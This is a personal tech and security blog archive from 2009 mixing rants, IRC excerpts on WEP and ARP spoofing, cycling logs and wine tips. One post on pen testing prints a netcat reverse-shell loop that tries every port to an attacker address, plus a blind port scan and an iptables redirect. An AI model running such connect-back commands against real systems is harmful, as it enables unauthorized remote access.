Thursday, December 31, 2009

Perl has made me fat and happy

I’ve found that I have trouble learning other languages. I start a project to learn another language and out of necessity it has to be simple. But once I start on it I quickly start thinking about how much easier and faster I could get it done in perl.

Wednesday, December 16, 2009

Context-free Abstract Security Scale

crunge: I would like to propose a metric for security - the context-free abstract security scale. Its unit will be the Mitnik. It is a logarithmic scale based on the natural log so something rated at 8 Mitniks is about 2.7183 times as secure as something rated at 7 Mitniks.
radsy: seems fair
adam_vollrath: there are a few metrics out there, government certification of platforms and junk like that
crunge: So when someone asks "How secure is OpenBSD out of the box?" you can answer with confidence, "11.8 Mitniks".
adam_vollrath: sounds dangerously misleading. and funny, i assume you're being funny
crunge: But this is abstract, and context-free so anything can be compared against anything else.
crunge: to be able to compare anything to anything else you need a measure with no inherent meaning. Meaning really screws up graphs.
crunge: It'll revolutionize the industry
tonymec: crunge: this scale would have to evolve, as today's stuff is a lot more secure (hopefully) than what was used X decades ago. However log(1) is 0 in any log base, so "normal" security would have to be kept at 0 mitniks, pushing yesterday's stuff, if it doesn't change, farther and farther into the negative, like identical answers to an IQ test give you a far worse score than they did your parents a generation ago.
crunge: Can you imagine the value to Pen Testers? They can walk in, sum up the Mitniks based on their evaluation and then itemize the gain in Mitniks based on implementing their recommendations
crunge: and IT managers can plot growth in Mitniks as policies are implemented. You'd be able to quantify ROI on buying that new IPS
crunge: tonymec: even better. It would be based on the average which would of course be determined by the Pen Testers. I smell a business model paradigm shift.
adam_vollrath: now you just need to create synergy between stakeholders
crunge: adam_vollrath: oh yeah, and crowdsource it.

Tuesday, December 15, 2009

I Won a Naming Contest

I Won a Naming Contest


Kooky, I didn’t realize it until Frank got an email to me today. Word, I dig champagne.



Those who deal with security on a regular basis should take a look at Seccubus. It’s one thing to do a scan today and know about the vulnerabilities on your network today, but wouldn’t you like to know about a new potential risk as soon as possible?

Monday, December 7, 2009

Way to Protect Me Wamu/Chase/Whoever

So I get a notice saying my ISP failed to charge my CC on file. I go to check it out and the number they have on file is for a card that is supposed to be dead, it was replaced when the mag stripe wore out, maybe a year ago.



Both cards have apparently been active this last year.

Thursday, December 3, 2009

Noxious Cloud Computing

Ah, buzzwords. I generally dismiss them because they don’t really mean much and I should probably just dismiss Cloud Computing but I can’t. The term makes me angry. That might sound silly but I think it’s justified. Web 2.0, AJAX, and Long Tail are also buzzwords but they don’t make me angry. When people try to put those buzzwords into practice it’s really no big deal, they’re just subscribing to a fad and eventually it falls out of fashion. No big deal.



Cloud Computing is different. What is Cloud Computing? It’s where your processing and data is in The Cloud. What the crap is The Cloud? As a network professional I feel I’m qualified to answer this question simply, succinctly, and thoroughly. The Cloud is a symbol a network diagram. It represents The Internet. It looks like a cloud. It looks this way because the Internet is nebulous.



That’s all it is. If you’re using Cloud Computing your computing is happening out there, in that part of the diagram: the one representing The Internet. There’s one key thing that separates Cloud Computing from traditional Internet hosting and services. With traditional Internet hosting and services your pictures are on flickr or photobucket, your email is with yahoo or hotmail or gmail, and your shopping is through ebay or amazon. With those services your have more or less fixed resources and your stuff lives on some servers somewhere.



With Cloud Computing, where’s your stuff? Do you know? I hear people say, “Oh, my pictures exist in the cloud.” Well, where are they? They’re in the cloud. It seems to me that people think that in the cloud means their resources are everywhere and will be accessible from anywhere. When your stuff is in the cloud it apparently means it can never be inaccessible, or lost, or stolen.



The reality is that in the cloud means that you don’t know where your resources are. That’s not to say that you should, either. If your grandpa uses picassa for his pictures he doesn’t need to know where the files live or it’s preserved (although it’s to his benefit to be able to know how his data might be lost). Google probably doesn’t want your grandpa to know how the backend of picassa works because that might represent a security risk.



I’ll selectively borrow from Wikipedia what doesn’t challenge my rant:




In concept, it is a paradigm shift whereby details are abstracted from the users who no longer need knowledge of, expertise in, or control over the technology infrastructure “in the cloud” that supports them.




What does that mean? It means when your data is in the cloud it somewhere on the Internet and you neither know nor care where. That’s not to say it’s somehow more accessible, more available, or more secure. It just means users don’t know. And not knowing is fine but before Cloud Computing your grandpa didn’t know where his pictures were and he knows no more or no less now that Cloud Computing is here.



I guess saying Cloud Computing sounds cooler and smarter than, “On the Internet, somewhere.” What it sounds like to me is that you don’t know but either are afraid to say you don’t know or don’t realize you don’t know. I think this Cloud is really a fart - it smells terrible and will hopefully disperse soon.

Rode 11 Miles

Needed to get my car serviced but still go to work. Didn’t want to ask anyone to drive me there and back. Luckily the auto shop is only 5.5 miles from work so I threw my bike in the back of my car, drove to the shop, then rode to work.



All told, 11 miles today with some hills on the way back. I tried to just push harder instead of downshifting and was successful some of the time. I’m please overall.



Also, if you’re in the San Diego area, Mira Mesa Automotive, owned by Jim Boucher (Boo-shay) does good work and they don’t mess around with you.

Monday, November 9, 2009

WEP Weakness Explained

HS^^: "Because RC4 is a stream cipher, the same traffic key must never be used twice. The purpose of an IV, which is transmitted as plain text, is to prevent any repetition, but a 24-bit IV is not long enough to ensure this on a busy network. The way the IV was used also opened WEP to a related key attack. For a 24-bit IV, there is a 50% probability the same IV will repeat after 5000 packets."
HS^^: so what happens if the IV is the same
HS^^: and the traffic key is the same...
HS^^: then you have 2 exactly the same packets, what does it matter
crunge: HS^^: Do you understand what stream ciphers do?
HS^^: crunge they encode per bit.. thats what i just read
crunge: HS^^: specifically they spit out a keystream that is XORed with the plaintext
crunge: HS^^: A given key will always spit out the same keystream. In WEP the IV is used as part of key. For 64 bit you have 40 bits of key and 24 bits of IV
crunge: HS^^: So when an eavesdropper sees two packets encrypted with the same key and IV he can XOR those packets together and recover the keystream for that key+IV. He can XOR that against the original packets and any other packets with that key+IV to decrpt them
crunge: HS^^: He can now also encrypt arbitrary packets using that keystream
crunge: HS^^: He can then use *that* technique to throw out broadcast messages using his known keystream to cause other hosts to send replies with previously unseen IVs which he collects. Thus he builds up his database of IV -> keystream mappings
crunge: HS^^: This database I believe is then used in a known plaintext attack to recover the key
ToXBoT: crunge, how the eavesdropper can manage to conclude that the two packets are encrypted with the same key+IV?
crunge: ToXBoT: the IV must be included in the packet in the clear. Otherwise no host would know the IV and therefore no one would be able to decrypt it.


Addendum: The above is slightly incorrect. XORing the two ciphertexts together produces the XOR of the two plaintexts. This should be fairly easy to crack. Once one of the plaintexts is recovered the attacker can recover the keystream.

Friday, November 6, 2009

I understand your reasons for making your choices, but try and understand mine before you discount them; I don’t vote for anybody who abuses my rights, like I wouldn’t put up with someone who would demand to kick me in the nuts before I could walk into my own house. I don’t vote for whoever might give my cojones the weakest kick- I vote for someone who isn’t going to kick me there. When more people do that, we will all see better presidents and senators. Until enough people do that, all we will see is more nut-kicking, and being handed an ice pack by the winner doesn’t make it any better.

"I understand your reasons for making your choices, but try and understand mine before you discount them; I don’t vote for anybody who abuses my rights, like I wouldn’t put up with someone who would demand to kick me in the nuts before I could walk into my own house. I don’t vote for whoever might give my cojones the weakest kick- I vote for someone who isn’t going to kick me there. When more people do that, we will all see better presidents and senators. Until enough people do that, all we will see is more nut-kicking, and being handed an ice pack by the winner doesn’t make it any better."
-- Bill Albertson in a comment on BoingBoing about the ACTA (via brettflorio)

ACTA: Are you guys done yet?

ACTA: Are you guys done yet?


Here we have a set of rules that are basically unenforceable.



“That ISPs have to proactively police copyright on user-contributed material.”



If you’re a connectivity provider you can’t effectively monitor all the traffic going through your network and still provide high quality service. The ISPs that have the most effective monitoring will provide the poorest service and lose customers to those ISPs that have less effective monitoring.



If you’re a hosting company it’s a similar problem. The servers on that network have an enormous amount of deep content that can’t easily be discovered through probing and can’t be discovered when going over an encrypted channel. Hosting companies charge for bandwidth. Are they going to charge their customers for bandwidth used while the hosting company is looking for copyrighted material?



“That ISPs have to cut off the Internet access of accused copyright infringers or face liability.”



And that will stop them from going to another ISP? Preferably one that doesn’t shut of their own customers (and lose business) so readily?



“Mandatory prohibitions on breaking DRM, even if doing so for a lawful purpose (e.g., to make a work available to disabled people; for archival preservation; because you own the copyrighted work that is locked up with DRM)”



Because it’s worked so well thus far.



Stuff like this is great. It wastes taxpayer time and dollars. The product serves to put pressure on the filesharers and make them better at what they do. I’d like to see some kind of evidence that DMCA has reduced copyright violation. I’m willing to bet that it’s gone up since DMCA was created.



If this goes through and we see that it does nothing to stop “the problem” can we finally agree that we as a society don’t have time for bullshit like this?

Tuesday, November 3, 2009

Can't Connect to Cyrus Sieve

So I’m trying to use sieveshell on a cyrus imap server. It just tells me it can’t connect. The logs are very not helpful:




Nov 3 19:39:50 li9-96 cyrus/master[2167]: about to exec /usr/lib/cyrus/bin/timsieved
Nov 3 19:39:50 li9-96 cyrus/sieve[2167]: executed
Nov 3 19:39:50 li9-96 cyrus/sieve[2167]: accepted connection
Nov 3 19:39:54 li9-96 cyrus/master[2160]: process 2167 exited, status 0


I try to telnet and it works:




jason@renfield:/etc$ nc localhost 2000
"IMPLEMENTATION" "Cyrus timsieved v2.2.13-Debian-2.2.13-14+lenny3"
"SIEVE" "fileinto reject envelope vacation imapflags notify subaddress relational comparator-i;ascii-numeric regex"
"STARTTLS"
OK
LOGOUT
OK "Logout Complete"


A lot of looking and I find this: http://linux.derkeiler.com/Mailing-Lists/Debian/2004-02/3871.html but I’m already set to PLAIN. In fact my configs, versions, and OS are exactly the same on this system as on another system where sieve is working fine.



Eventually I notice this connecting to my working box:




jason@hatchery:/etc$ nc localhost 2000
"IMPLEMENTATION" "Cyrus timsieved v2.2.13-Debian-2.2.13-14+lenny3"
"SASL" "NTLM LOGIN PLAIN DIGEST-MD5 CRAM-MD5"
"SIEVE" "fileinto reject envelope vacation imapflags notify subaddress relational comparator-i;ascii-numeric regex"
"STARTTLS"
OK
LOGOUT
OK "Logout Complete"


There’s an extra line in there, beginning with “SASL”. The other guy had a SASL problem. I had already check to make sure I have the same cyrus packages but I didn’t check sasl packages. I finally find that I’m missing libsasl2-modules. Install that, restart cyrus and saslauthd (probably didn’t need to restart both), and everything works.



It would have been nice if sieveshell said, “I can’t connect because there’s no SASL mechanisms”.

Tuesday, October 13, 2009

You STEAL your software

You STEAL your software


…because no one can afford to write professional quality software and then give it away for free.

Friday, October 9, 2009

Biked 8 miles... on the Freeway

4 miles there, 4 miles back. downhill half the way there… uphill half the way back.

Friday, October 2, 2009

Dialing for nmap

http://www.geisterstunde.org/drupal/?q=nmap



This is pretty clever. Dude rigged up some Asterisk dial plan to kick off nmap against an IP that you punch in, separated by pounds.



What would be really fun would be to make one of these publicly available, maybe even by 800 number, then make a note of all the IPs that people think are worthy of being scanned. Could be someone’s already found a host they think is more exposed than it should be.

Rogue Phone Charging Station

You may have seen cell phone charging stations at airports. They take your money and have adapters for a lot of different phone times. Stick your money in, plug in your phone and get it charged during your layover.



This got me thinking - a lot of phones, particularly smart phones, are going to USB cable charging. This makes sense since they’ve got cameras, play MP3s, and any number of mobile device functions. These functions generate and consume a lot of data that’s got to come from somewhere and has to be backed up. Since USB does data transfer and does power it’s a natural fit.



Those charging stations provide power but don’t do data transfer. But what if they did? Would you notice? You plug in your phone and leave it plugged in for twenty minutes, how much data could it transfer? Most USB data devices expose them selves as simple read/write mass storage. A charging station could slurp up a lot of data in twenty minutes, especially if it knew where to look based on device type which could be determined through probing. It would be even quicker to drop a small piece of malware on the phone.



I’m not just about pointing out potential problems, I’m also about solutions. One could conceivably have a USB condom. This would be a USB coupler that will allow power to pass through and potentially could have enough smarts to probe the device plugged into it so that the device thinks it’s plugged into a computer. I’ve heard of devices that will only accept power when they’re plugged into a computer.



Keep this in mind. If your phone is low, might not be a good idea to plug it into a foreign port. That charging station or helpful stranger might not be as well-intentioned as it seems. Even if they are they might have been compromised such that they are unwitting participating in the compromise of your handheld device.

Rode to Work

Rode 6.2 miles to work. 35 minutes moving time. Got up to 33.5 MPH on a nice hill. =D

Thursday, September 24, 2009

Blind Connect-back Through Restrictive Firewall

The following scenario is admittedly far-fetched. It’s unlikely that you’ll actually encounter it but you might encounter a situation that’s similar. You’re in a pen test and you’ve found a host that you can execute commands on but you can’t see the results. It should be simple enough to shovel a shell back to you but that’s not working. You know you’ve got commands running because you can send a ping command and see the pings coming to you. There might be a restrictive firewall between you and the target that isn’t letting the TCP/UDP streams through for ports you choose. If this sounds silly consider that there are systems out there that actually use RPC over email.



You can craft a port scan through simple commands that you can launch into your target. However if you can’t see the results of the scan you don’t know what port you can connect through. A minimalist port scan might look like this:




(for i in seq 1 65536;do nc -zw 3 34.56.78.90 $i && echo $i open;done) > scan_results



In this case we can’t see the results. You can watch a packet capture on your box and then subsequently send another command to connect to the port that got through. I’m lazy, impatient and efficiency minded. Let’s combine our scan with the shoveling.




i=1;while [ $i -lt 65535 ]; do nc -e /bin/bash 34.56.78.90 $i && exit;i=$(( i + 1 ));done



So this will skip the port scan and just look for a way out. But what are you supposed to do, leave a netcat listening on every port? If you have an extra IP (34.56.78.91) we can send every port to our netcat port. It looks something like this:




iptables -I INPUT -p tcp -m state --state NEW -d 34.56.78.91 -j DNAT --to 34.56.78.90:5555



If your netcat listener is on 34.56.78.90:5555 any TCP connection to any port on 34.56.78.91 will get forwarded to your netcat listener. Blind injection could also be used to send packets to an idle host while you watch the IP IDs returned by the idle host. Essentially you can cause a remote host to start an idle scan for you to watch from your host, abstracting away your real IP.



This is all theoretical and it’s probably something you’ll never find a situation where this is the answer. I’ve played with pieces but haven’t put it all together. I’m just the idea guy.



Update: That was fast.

Life with Schizophrenia

Life with Schizophrenia


My girlfriend has schizoaffective disorder, a disorder closely tied to schizophrenia. I found this comic which explains many of the life experiences a schizophrenia sufferer has. I thought it was worth sharing. Most people have really inaccurate perceptions of schizophrenia and this clears many of them up.

Monday, September 14, 2009

Amarok: Unsafe at any speed

crunge: I can't help but wonder why Amarok is such an unstable piece of shit
mrecho: ya, dont like the new version
crunge: THe things it does it does well. What it doesn't do is... run
crunge: It's not the new version. It has always crashed just updating your library. And instead of fixing basic shit like that they're adding features
crunge: Amarok 2: Unsafe at any speed
mrecho: ive never had issues with amarok crunge ....
kaboofa: mpc :D
mrecho: even with 30+ gigs of music on it
crunge: Yeah. I have about that and it's never worked well. Not on Gentoo, not on kubuntu 32, nor kubuntu 64
mrecho: whats the main issue your having?
crunge: So I'll be browsing some websites right. Text websites, nothing with flash or sound. Amarok will be stopped, sitting in my tray. All of a sudden I get a notification saying Amarok has crashed
mrecho: wtf...
crunge: no reason I can get outside it rescanning my collection *which hasn't changed*
crunge: at it does this at random
crunge: I'm trying to add music to my girlfriend's ipod, which it seems capable of doing but when I *delete* songs it crashes.
crunge: When I launch it again if figures out that the songs are gone and I can try adding music again
crunge: and this isn't a bug it's just a retarded absence of a feature. You can add songs to a music device by finding a track and right click blah blah blah. Unless it's in your playlist. Can't do it from your playlist. So if you've got a playlist of the stuff you want, too bad
crunge: you have to find the actual playlist file and add that to your device. But it won't tell you where it actually saves the playlist. There is no Save As. Only Save.
crunge: which, it's probably in the fucking database. THere's an "export" option. So you *can* export it out of Amarok so Amarok can read it in and put it on your music player
crunge: Hey! I got those songs to load. And 80% of the titles are SHA1 hashes

Friday, September 11, 2009

Unified Threat Management

Saying that an appliance provides Unified Threat Management is like saying a kevlar vest provides Complete Bodily Protection.

Bike Ride

6.2 mile ride to work with a friend. A couple of small uphills and a few large downhills. Not looking forward to the trip home.



The trip home was better than the trip there. Got into a great groove going up the hills. Helped having a fellow rider to talk with. Got home feeling really good.



12 miles total (return trip was more right turns)

Wednesday, August 26, 2009

Monday, August 24, 2009

Here we clearly demonstrate the line that classifies disorders. It’s a disorder when it interferes destructively with your life. Calvin’s possible disorder only reinforces his behavior as a little boy.

Wednesday, August 19, 2009

Pwnd Adj This Lady


PWND (adj): This lady.

Apologize to Alan Turing

Apologize to Alan Turing


There’s a petition getting signatures demanding that the British government apologize (posthumously) to Alan Turing for their treatment of him as a homosexual.



I think they saw the objective, jumped in their cars and drove right passed it, waving in a really friendly way. Alan Turing wasn’t convicted of being Alan Turing, he was convicted of being a homosexual. Lots of people were homosexual at the time and were persecuted for it. No one at the time was persecuted for being Alan Turing.



How about we make a petition for the government to apologize to all homosexuals for their treatment by the government? Alan Turing is dead and I don’t think an apology is going to change that or make him feel better. But it might make some homosexuals that are alive feel a little better if they receive an apology.



Hooray for empty gestures!

Tuesday, August 18, 2009

How to Make Friends

Someone on a forum was relating how they feel they need more friends and asking how they can go about getting them. They explained a failed attempt to make friends at a political gathering and concerns about people with different religious beliefs. I said this:




Friends are a subset of people and compatibility, in my opinion, only has a loose correlation with matching interests. You might meet people whose interests match up to yours 90% of the time and you’ll find that they’re a dick. Interests really don’t matter that much in making friends.



You don’t control the fish you catch, you just fish until you catch one, evaluate the fish to see if it matches your criteria. To increase the chances of getting the fish you want is to try fishing a lot. Of course in the process of fishing you get better at fishing.



If you want to make friends you just have to meet and engage a lot of people. Random people in random places. You engage a lot of people and you increase your probability of finding a friend. I believe you should forget about focusing on places where people with similar views congregate. Go out to places and engage the people you find where you go… the bar, the grocery store, the gym, the hardware store. A lot of people will think you’re a freak because some part of their brain is still four years old and is afraid to talk to strangers. Whatever, they’re welcome to self-segregate.



As for religious, political, or similar affiliations, push that aside. Well balanced people don’t spend every waking moment staring at their religion or political ideology. Well balanced people have those things as a part of their life but most of their life is working, spending time with their family and friends, and totally mundane shit like making toast. Few people make toast for Jesus, G-d, Allah, or whoever. They make toast because they’re hungry. The people that make toast for the Democrats or Shiva are batshit and should be avoided. If you engage the well balanced people with an open mind and interest in their beliefs you’ll learn a lot about what makes them who they are. If they have an open mind they’ll wonder about your beliefs and how those beliefs make you who you are. If they try to shove their beliefs down your throat tell them to knock it off and don’t do it in the future. If they fail at that remove them from their friend candidacy.



We all have more common ground than not. the rain falls on the rich and poor alike. We’ve all experienced loss, we all like food, we all wonder to some degree what things are all about. Jobs, political beliefs are ephemeral and a poor basis for friendship anyway.



All that rambling aside, what I think you want to look for is a attitude. They can hate your music, hate your clothes, hate your hobbies but if your attitudes are compatible then you might be life long friends.


Tuesday, August 11, 2009

A little over five mile ride with moderate hills. Gloomy and overcast. Bike seat wasn’t tight enough so I was shifting back and forth most the ride.

Thursday, August 6, 2009

Speaking of Twitter...

I’ve heard it’s pretty big in Iran, and they had a relatively unpopular fellow sworn for president having won 2/3 of the popular vote…

Twitter's Getting DDoS'd

I wonder if the packets are 140 bytes or less.

Wednesday, August 5, 2009

Van Halen M&M's: Really Clever

Van Halen M&M's: Really Clever


I had heard the story about NO BROWN M&Ms before but never heard the real explanation. The truth is that that part of the contract was really, really clever.

Tuesday, August 4, 2009

GRRRRRARRRRRRRR! MURDER!

Why is it so hard to demonstrate to tech support people that you know what you’re talking about? I guess it’s because they normally deal with people who don’t know what they’re talking about. I’m sure a lot of those people immediately say they know what they’re talking about.



But I do. In fact, I know more than both the senior guys on the other end of the line. But I get to listen to the polite one have me conduct useless tests and the defensive one tell me my network setup is wrong when he doesn’t really have a handle on networking.



It starts when defensive guy comes to upgrade our stuff. He logs into the provider-owned router and sees some settings he doesn’t recognize so he deletes them. Doesn’t even question their existence. That device was subsequently determined unnecessary and removed but the missing functionality was never configured elsewhere as appropriate. Because the guy assumed it was a mistake and not critical configuration.

Saturday, August 1, 2009

This is a terrible picture of the view in the other direction.



This picture is also against the rules.

This picture is against the rules. I was told I couldn’t take this pucture even though it has nothing to do with the performance.



A better reason would be that looking at a picture of a city is like looking at a stuffed hummingbird: you capture the idea but lose everything about the experience that makes it amazing.

At the San Diego summer pops at Embarcadero south. I really live in a beautiful city.

OpenSolars limits usernames to 8 chars

http://www.opensolaris.org/os/community/security/library/long_usernames/%3Bjsessionid=1BE7FA9181CEC82352B564BE46EDD045



Oh noes! we’z might lose supports for rcp/rdist/uucp. Those are teh internetz!



Really, Sun? Really?

Friday, July 31, 2009

Apple Claims New iPhone Only Visible To Most Loyal Of Customers

Apple Claims New iPhone Only Visible To Most Loyal Of Customers


I too can see it!

OMG! My ignorance about dreadlocks makes other people inferior!

OMG! My ignorance about dreadlocks makes other people inferior!


These are actually my friend’s dreadlocks. I shouldn’t be but I’m stunned about how bad or disinclined people are about recognizing and challenging their assumptions. If someone is doing something I don’t understand it must mean that that they are stupid, right?



I didn’t get a hair cut for six years so my hair got silly long. When I eventually got it cut I donated it so some poor kid getting chemo can have some hair. When you get lots of hair cut off some barbers/stylists will ask, “Would you like to donate your hair?”



People assert that dreadlocks are created by not washing your hair and that you can’t. Proper dreadlocks are created by not combing your hair. Wash liberally. The texture of dreadlocks kind of reminds me of a wool blanket. Is it really so hard to wash a wool blanket?



Even if something being given away is not something you think is useful, why give people shit for trying to give something away that someone might find useful?

Ceci n'est pas une clé

I have one of those remote keyless entry key fobs for my car, to unlock and lock the doors as I approach and leave my car.



Anyone else occasionally find yourselves not thinking and try to use it on the front door of your home?

Thursday, July 30, 2009

Jailbreaking iPhone Causes Nuclear War (ish)

Jailbreaking iPhone Causes Nuclear War (ish)


So, it should be illegal to load custom software on your iPhone because you could potentially use it to disrupt cel towers.



Isn’t it already illegal to disrupt cel towers?

Wednesday, July 29, 2009

Recursion

Recursion


Tumblr Captures the Essence of Web 2.0

For those who aren’t indoctrinated, tumblr has a feature called “reblogging”. You see a post on another tumblr user’s blog that you like. There’s a link that says reblog. Click this and boom, it’s now on your blog with a little space on the bottom for you to say lol or wtf or this is so stupid.



As I browse the directory for some of the blogs with the highest “tumblarity” I find a common thread: they’re mostly pictures and the same pictures as you see on digg, reddit, etc and on each others’ blogs. Many of the posts you find on digg, reddit, and the like are simply references to blog posts talking about the thing that’s actually of interest.




v---<---<---<---<---<---<---<----+
+--> Tumblr Reblog Ad Nausem ->--^--> Original Tumblr ---> Twitter --> Reddit --> Random Blog -v
+--> Tumblr Reblog Ad Nausem ->--v--> Original Tumblr ---> MySpace --> Digg ----> Random Blog -+--> Actual Story
^---<---<---<---<---<---<---<----+


And this is really the essence of blogging, the essence of Web 2.0. It’s not that everyone participates in building new and exciting media. A few people make new and exciting media and others swarm around it and show it to you hoping that they can catch just the tiniest bit of fame or recognition for having brought it to you. Web 2.0 brings everyone the power to have their voice heard; puts a microphone in everyone’s hand. Alas, most people don’t have anything interesting to say but given the microphone you have to say something.



If this is Web 2.0, I think I’ll hold out for SP1.

Tuesday, July 28, 2009

Monday, July 27, 2009

Friday, July 24, 2009

Copy-cats Deploy Trojans on Anti-sec's Fame

Copy-cats Deploy Trojans on Anti-sec's Fame


An interesting tool has been seen in the wild that shares its name with one used by Anti-sec in one much ballyhooed intrusion. However instead of being the tool to help you own a box it gets you owned.



I can’t really endorse this kind of thing but it is a good reason why people need to learn security principles if they hope to put them into practice.

CBC-MAC on the command line


openssl enc -e -aes-128-cbc -K 0123456789ABCDEF -iv 0000000000000000 < testdata | tail -c 16 | od -h




The 16 “tail -c 16” corresponds to the block size of the encryption algorithm. If you were using aes-256-cbc you’d want to say 32 instead of 16. I don’t like the “od -h” representation but hex is more common and I care to dig through and just get hex. You could instead use | openss enc -e -base64 if you prefer base64.

CSS Is Awesome

CSS Is Awesome




Go buy one.

Anti-Sec spoof threatens s'kiddie mayhem

Anti-Sec spoof threatens s'kiddie mayhem


The problem with not giving a verifiable identity is now anyone can claim to be you and there’s no way for you to dispute the claims or actions of an impersonator.



I was thinking about these site defacements by Anti-sec and came up with what I thought could secure or destroy their credibility. If they breached a site they could leave a PGP/GnuPG public key and explain that they’re tired of the copycats and that all future “messages” would be signed by a key that’s signed by this key. The intermediate key should have an expiration no longer than a couple months. In theory, all future attacks can be verified as the work of Anti-sec or not.



That is, unless someone not in Anti-sec beat them to the punch. If someone outside of Anti-sec posted such a key claiming to be Anti-sec, especially noting that they’re tired of the impersonators it goes into an “our word against theirs” situation. The impostor(s) would then have to conduct a few more breaches in the same style as Anti-sec to establish “legitimacy”.



In theory a public key can serve as a verifiable identity but it doesn’t quite work like that. It can really only be used to verify someone has access to the corresponding private key. Someone can throw their key out there claiming to be Brad Pitt and we have to decide whether or not to accept his in-person denial of that claim. Having committed crimes no one from Anti-sec is going to step forward in person, prove they’re Anti-sec (somehow) to make authoritative claims about a public key. I think the difference between private key holder and identity is sufficiently subtle that most people wouldn’t quite perceive the difference. They could stand to lose a lot of credibility.



When you want to be anonymous but still make claims of identity, remember:



Wednesday, July 22, 2009

Tips on Wine

I know… basically crap about wine but my friend Gordon knows quite a bit. I respect Gordon a lot so I try to learn about wine here and there. My hurdle is that I don’t drink enough to buy bottles of wine for myself and my girlfriend doesn’t drink at all.



I thought I’d share what he shared with me on how to do well as a wine newbie.




Both of you have asked me about what wine to buy. Here is a list a
wineries that produce good wines each year. The list is in no particular
order



  • Berringer

  • Kendall Jackson

  • Robert Mondavi

  • Meridian

  • Kenwood

  • Clos DuBois

  • Beaulieu Vineyards

  • Michael Pozan

  • Beaujolais Villages

  • Macon

  • Yellow Tail

  • Rosemount

  • Santa Rita

As far as types of wines goes, Chardonnay is the most versatile white
wine and most variable depending on what region it comes from. Bringing
Chardonnay or White Bordeaux for fish is always safe. I have found
Pinot Grizio and Sauvignon Blanc to be good with lighter fish and
especially shell fish. A blend of Chardonnay and Pinot Grizio is not
easy to find but it is the best I have found for shell fish.



Merlot is the most versatile red wine and the most variable. It is
heaviest (Cabernet like) from California and France. It is much lighter
(like Beaujolais) from South America and Australia. With meat or highly
seasoned food it is always safe to bring a Cabernet, Syrah, Malbec or a
Merlot from California. For an italian meal or pizza Valpolicella,
Chianti (not a Chianti Reserve which is a good substitute for a
Cabernet), a Shiraz from South America or Australia as well as a
Beaujolais or a Merlot from South America or Australia are all good
choices. For Cheese a Cabernet from South America or Australia as well
as a Bordeaux from France are good choices. A Bordeaux from France is a
little heavier than a Merlot from South America or Australia and lighter
than a Merlot from California. A Bordeaux is a versatile wine and goes
well with meat dishes as well as Italian Food. I have found Bordeaux to
be much more consistent than Merlot. Your mother and Ilona have a
decided preference for French wines.



In terms of countries, the French are the most consistent. A French
Chardonnay is always a good choice for fish. A French Cabernet for
steaks is a good choice. A Bordeaux is great for lamb or Italian food
or spicy foods in general. A Beaujolais is great as a red wine for fish
especially when highly seasoned as well as just for sipping or for
appetizers.


Tuesday, July 21, 2009

New Technology to Make Digital Data Self-Destruct

New Technology to Make Digital Data Self-Destruct


Apparently these researchers have never heard of copy and paste. Or screenshots. Or DRM.



This kind of “technology” scares me. People will use this technology thinking their privacy is assured because a message can’t be read after a certain time.



Once you let a piece of data out, it is out. Any attempts to get rid of it are futile.




“The Net interprets censorship as damage and routes around it.”
- John Gilmore




The Internet is just as much a collection of people as it is networking equipment and computers. It is the people that route around censorship and will always find ways to find, circulate, and keep the information they want.

Monday, July 20, 2009

New graphics card

I play WoW and like to run my settings high. I found that pretty much all the fog effects kill my frame rate. Eventually I spent about $200 on a EVGA GeForce 260 GTX 216. I cranked every setting in WoW to the max. I flew out of Dalaran over Crystalsong Forest and almost threw up. I could see everything. Normally the distance fog limits what I can see from high up but this time I could see the entire zone. I got a very strong feeling of vertigo from the realness of the altitude that I haven’t previously experienced in a video game.



Holy crap.

Eternal Earth-Bound Pets

Eternal Earth-Bound Pets


Boarding for pets left behind by The Rapture.

Sunday, July 19, 2009

ARP Spoofing

respecting: hello i want to prevent attacks from software like cain and abel
respecting: what must i do ?
crunge: respecting: learn the attacks that tool X does then prepare appropriate defenses for those attacks
respecting: cain and abel made arp spoofing attacks
respecting: can you please give me a tool to prevent such attack?
respecting: Thanks in advance
crunge: respecting: Do you understand the nature of ARP spoofing?
respecting: Yes
respecting: i understand it
respecting: but i don’t know how can i prevent such attacks?
respecting: Can you please help me?
crunge: respecting: the solution is simple - hard code the ARP entries for each device in each device on the network
crunge: respecting: rather, get rid of ARP by hard-coding the IP-MAC relationships
crunge: I didn’t want to insult you by asserting that you don’t understand ARP and ARP spoofing, but I guess I’m content insulting you with an absurd resolution
crunge: To my knowledge there isn’t a good way to prevent ARP spoofing with software. Some switches will allow you to specify which IPs should be seen on each port
crunge: what you can do is get a tool like arpwatch that will track ARP replies and alert you when an IP-MAC relationship changes

Wednesday, July 15, 2009

I’ve taken this image for my Favicon/Avatar with permission from the artist. I’ve always liked koi but moreso after reading “Flatland” and “Hyperspace”. The latter shares the idea that fish might have scientists who wonder about the nature of their universe (the water) and what’s beyond it. Because they cannot openly pass the boundary of the water nor do they have good reason to do so they have little idea what’s outside their universe and most have no concern about the topic.



I think we’re not unlike the fish. There are the boundaries of our everyday experience and we seldom think about what’s past them. If we could break out of our everyday experience we might discover a universe greater in scale and wonder than we are capable of imagining.



Take a few moments to browse this artist and discover his work.

Sunday, July 12, 2009

Down Atheist, Down!

I think I’m right so you’re stupid



In terms of religious beliefs I think of myself as an agnostic working under atheist assumptions. I’m an agnostic because I don’t have the chutzpah to assert that small, short-sighted, fallible me somehow knows that there can’t be something powerful enough to escape my notice. Maybe God just manifests himself as neutrinos which easily escape my notice. I also don’t care to search for a God so I need to direct my life somehow. I assume there isn’t a God because that seems like a logical premise that matches my observations.



The key for me is that I’m willing to come right out and state that I don’t know what I’m talking about. My assumption that there isn’t a God is based purely on rhetoric, not on scientific, mathematical, or other proof. Because I don’t actually know anything about the subject matter I’m hardly in a position to tell others that they are wrong.



I’ve seen a lot of pro-atheist hate on the Internet over the last few months and frankly it makes me sad. Many articles and postings are targeted specifically at Christianity and are in the vein of, “Hey, look at this silly thing that these Christians believe!!” except there’s more lolspeak. Many atheists that you encounter are such because they’re lashing out against a set of beliefs that were thrust upon them. Don’t they see that their ridicule is no different? Ridicule serves three purposes: to make the giver feel artificially superior, to make the receiver feel artificially inferior, and to try to change the behavior of the receiver. The first two are of no merit, the last is exactly the kind of thing the “lashing out” atheists started lashing out against to begin with.



